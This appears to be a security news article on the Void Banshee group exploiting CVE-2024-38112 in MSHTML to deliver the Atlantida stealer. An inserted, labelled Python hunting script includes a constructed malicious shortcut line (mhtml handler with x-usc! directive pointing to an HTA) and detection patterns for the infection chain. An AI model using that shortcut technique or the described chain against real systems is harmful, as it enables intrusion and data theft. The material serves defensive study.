
Void Banshee APT Exploits Microsoft MHTML Flaw to Unfold Atlantida Stealer


An advanced persistent threat (APT) group called Void Banshee has been observed exploiting a recently disclosed security flaw in the Microsoft MHTML browser engine as a zero-day to deliver an information stealer called Atlantida.

Cybersecurity firm Trend Micro, which observed the activity in mid-May 2024, said the vulnerability – tracked as CVE-2024-38112 – was used as part of a multi-stage attack chain using specially crafted internet shortcut (URL) files.

“Variations of the Atlantida campaign have been highly active throughout 2024 and have evolved to use CVE-2024-38112 as part of Void Banshee infection chains,” security researchers Peter Girnus and Aliakbar Zahravi said. “The ability of APT groups like Void Banshee to exploit disabled services such as [Internet Explorer] poses a significant threat to organizations worldwide.”


The findings dovetail with prior disclosures from Check Point, which told The Hacker News of a campaign leveraging the same shortcoming to distribute the stealer. It is worth noting that CVE-2024-38112 was addressed by Microsoft as part of Patch Tuesday updates last week.

CVE-2024-38112 has been described by the Windows maker as a spoofing vulnerability in the MSHTML (aka Trident) browser engine used in the now-discontinued Internet Explorer browser. However, the Zero Day Initiative (ZDI) has asserted that it is a remote code execution flaw.


“What happens when the vendor states the fix should be a defense-in-depth update rather than a full CVE?,” ZDI’s Dustin Childs pointed out. “What happens when the vendor states the impact is spoofing but the bug results in remote code execution?”


Attack chains involve the use of spear-phishing emails embedding links to ZIP archive files hosted on file-sharing sites, which contain URL files that exploit CVE-2024-38112 to redirect the victim to a compromised website hosting a malicious HTML Application (HTA).

Opening the HTA file results in the execution of a Visual Basic Script (VBS) that, in turn, downloads and runs a PowerShell script responsible for retrieving a .NET trojan loader, which ultimately uses the Donut shellcode project to decrypt and execute the Atlantida stealer inside RegAsm.exe process memory.


Atlantida, modeled on open-source stealers like NecroStealer and PredatorTheStealer, is designed to extract files, screenshots, geolocation, and sensitive data from web browsers and other applications, including Telegram, Steam, FileZilla, and various cryptocurrency wallets.

“By using specially crafted URL files that contained the MHTML protocol handler and the x-usc! directive, Void Banshee was able to access and run HTML Application (HTA) files directly through the disabled IE process,” the researchers said.

“This method of exploitation is similar to CVE-2021-40444, another MSHTML vulnerability that was used in zero-day attacks.”
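As an added illustration (not code from the article, Trend Micro, or Check Point), the Python script below shows how a defender might hunt for the two indicators described above: Internet Shortcut (.url) files whose target invokes the MHTML protocol handler together with the x-usc! directive, and process-creation telemetry whose ancestry matches the HTA (mshta.exe) -> VBS (wscript.exe) -> PowerShell -> RegAsm.exe chain. The file contents, host names (on the reserved .invalid domain), process IDs and image names are constructed samples; the regular expressions and the exact chain order are assumptions built only from the components the article names, not vendor signatures.

```python
"""Hunt for the two indicators the article describes:
1. .url files invoking the MHTML handler plus the x-usc! directive
2. a process ancestry mshta -> wscript -> powershell -> RegAsm
All inputs below are constructed samples for illustration."""
import re
from dataclasses import dataclass

# Indicator patterns (assumptions derived from the article's description).
# A legitimate shortcut targets http(s):// directly; the MHTML handler and the
# x-usc directive together are what the article associates with CVE-2024-38112.
URL_LINE = re.compile(r"^\s*URL\s*=\s*(?P<target>.+?)\s*$", re.IGNORECASE | re.MULTILINE)
MHTML_HANDLER = re.compile(r"^mhtml:", re.IGNORECASE)
XUSC_DIRECTIVE = re.compile(r"!x-usc|x-usc!", re.IGNORECASE)
HTA_TARGET = re.compile(r"\.hta\b", re.IGNORECASE)


def scan_url_file(text):
    """Return the list of indicator names found in one .url file's text."""
    findings = []
    for match in URL_LINE.finditer(text):
        target = match.group("target")
        if MHTML_HANDLER.search(target):
            findings.append("mhtml-handler")
        if XUSC_DIRECTIVE.search(target):
            findings.append("x-usc-directive")
        if HTA_TARGET.search(target):
            findings.append("hta-target")
    return findings


# Expected parent->child order of the infection chain from the article.
SUSPICIOUS_CHAIN = ["mshta.exe", "wscript.exe", "powershell.exe", "regasm.exe"]


@dataclass
class ProcEvent:
    """Minimal process-creation record (constructed, EDR-style)."""
    pid: int
    ppid: int
    image: str


def find_chains(events):
    """Return PID lists [mshta, wscript, powershell, regasm] for every RegAsm
    process whose ancestry matches SUSPICIOUS_CHAIN exactly."""
    by_pid = {e.pid: e for e in events}
    chains = []
    for event in events:
        if event.image.lower() != SUSPICIOUS_CHAIN[-1]:
            continue
        path = [event]
        current = event
        for expected in reversed(SUSPICIOUS_CHAIN[:-1]):
            parent = by_pid.get(current.ppid)
            if parent is None or parent.image.lower() != expected:
                path = None
                break
            path.append(parent)
            current = parent
        if path is not None:
            chains.append([p.pid for p in reversed(path)])
    return chains


# Constructed samples (hosts use the reserved .invalid TLD).
SAMPLE_MALICIOUS_URL = (
    "[InternetShortcut]\n"
    "URL=mhtml:http://files.example.invalid/archive/!x-usc:http://files.example.invalid/page.hta\n"
)
SAMPLE_BENIGN_URL = "[InternetShortcut]\nURL=https://www.example.invalid/\n"
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "explorer.exe"),
    ProcEvent(200, 100, "mshta.exe"),
    ProcEvent(300, 200, "wscript.exe"),
    ProcEvent(400, 300, "powershell.exe"),
    ProcEvent(500, 400, "RegAsm.exe"),
    ProcEvent(600, 100, "powershell.exe"),  # unrelated admin shell, no RegAsm child
]

if __name__ == "__main__":
    print("malicious .url:", scan_url_file(SAMPLE_MALICIOUS_URL))
    print("benign .url:   ", scan_url_file(SAMPLE_BENIGN_URL))
    print("chains:        ", find_chains(SAMPLE_EVENTS))
```

In practice the `.url` scanner would be pointed at mail-gateway attachment extracts and user download folders, while `find_chains` would run over the EDR's process-creation stream; the chain check is deliberately strict (every hop must match) to keep false positives low, at the cost of missing variants that insert an extra hop.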

Not much is known about Void Banshee other than the fact that it has a history of targeting North American, European, and Southeast Asian regions for information theft and financial gain.


The development comes as Cloudflare revealed that threat actors are swiftly incorporating proof-of-concept (PoC) exploits into their arsenal, sometimes as quickly as 22 minutes after their public release, as observed in the case of CVE-2024-27198.


“The speed of exploitation of disclosed CVEs is often quicker than the speed at which humans can create WAF rules or create and deploy patches to mitigate attacks,” the web infrastructure company said.

It also follows the discovery of a new campaign that leverages Facebook ads promoting fake Windows themes to distribute another stealer called SYS01stealer, which aims to hijack Facebook business accounts and further propagate the malware.

“Being an infostealer, SYS01 focuses on exfiltrating browser data such as credentials, history, and cookies,” Trustwave said. “A big chunk of its payload is focused on obtaining access tokens for Facebook accounts, particularly those with Facebook business accounts, which can aid the threat actors in spreading the malware.”
